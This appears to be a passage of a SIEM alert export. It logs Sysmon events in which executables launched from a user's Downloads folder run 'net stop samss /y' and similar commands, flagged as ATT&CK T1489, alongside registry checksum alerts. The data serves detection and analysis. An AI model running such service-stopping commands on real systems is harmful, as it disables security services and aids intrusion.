\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:10.636"",""processGuid"":""{df9fc3d3-1ad6-5ec9-0000-001034401600}"",""processId"":""165592"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:10.530",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : 'ac1e9c4ca0229bb5925b076a73a904cf' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : 'e46fec78721d7e00a87d2fdb21eb7ed076a5e561' +" +"May 23, 2020 @ 12:45:10.496",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'c41ad3021855ef8cd7c9ad0e4681a63f' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : 'f369523ae0625f6dfe1d45cdf98cb4d47447d167' +" +"May 23, 2020 @ 12:45:05.660",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:58.665 +ProcessGuid: {df9fc3d3-1aca-5ec9-0000-001009751400} +ProcessId: 121020 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010716e1400} +ParentProcessId: 120708 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:58.667468100Z"",""eventRecordID"":""1695"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:58.665\r\nProcessGuid: {df9fc3d3-1aca-5ec9-0000-001009751400}\r\nProcessId: 121020\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010716e1400}\r\nParentProcessId: 120708\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:58.665"",""processGuid"":""{df9fc3d3-1aca-5ec9-0000-001009751400}"",""processId"":""121020"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1aca-5ec9-0000-0010716e1400}"",""parentProcessId"":""120708"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:45:05.638",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:58.559 +ProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010836e1400} +ProcessId: 120716 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1aca-5ec9-0000-001003651400} +ParentProcessId: 118972 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:58.604645100Z"",""eventRecordID"":""1694"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:58.559\r\nProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010836e1400}\r\nProcessId: 120716\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1aca-5ec9-0000-001003651400}\r\nParentProcessId: 118972\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:58.559"",""processGuid"":""{df9fc3d3-1aca-5ec9-0000-0010836e1400}"",""processId"":""120716"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1aca-5ec9-0000-001003651400}"",""parentProcessId"":""118972"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:45:05.622",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:58.558 +ProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010716e1400} +ProcessId: 120708 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:58.561566900Z"",""eventRecordID"":""1693"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:58.558\r\nProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010716e1400}\r\nProcessId: 120708\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:58.558"",""processGuid"":""{df9fc3d3-1aca-5ec9-0000-0010716e1400}"",""processId"":""120708"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:45:05.609",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:58.313 +ProcessGuid: {df9fc3d3-1aca-5ec9-0000-001003651400} +ProcessId: 118972 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:58.317749500Z"",""eventRecordID"":""1692"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:58.313\r\nProcessGuid: {df9fc3d3-1aca-5ec9-0000-001003651400}\r\nProcessId: 118972\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:58.313"",""processGuid"":""{df9fc3d3-1aca-5ec9-0000-001003651400}"",""processId"":""118972"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:57.189",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:49.086 +ProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00109d0d1300} +ProcessId: 82368 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00103e0a1300} +ParentProcessId: 82108 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:49.115478300Z"",""eventRecordID"":""1688"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:49.086\r\nProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00109d0d1300}\r\nProcessId: 82368\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00103e0a1300}\r\nParentProcessId: 82108\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:49.086"",""processGuid"":""{df9fc3d3-1ac1-5ec9-0000-00109d0d1300}"",""processId"":""82368"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1ac1-5ec9-0000-00103e0a1300}"",""parentProcessId"":""82108"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:44:57.173",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:49.004 +ProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00103e0a1300} +ProcessId: 82108 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:49.009928000Z"",""eventRecordID"":""1687"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:49.004\r\nProcessGuid: {df9fc3d3-1ac1-5ec9-0000-00103e0a1300}\r\nProcessId: 82108\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:49.004"",""processGuid"":""{df9fc3d3-1ac1-5ec9-0000-00103e0a1300}"",""processId"":""82108"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:57.110",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:48.895 +ProcessGuid: {df9fc3d3-1ac0-5ec9-0000-001085041300} +ProcessId: 81504 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 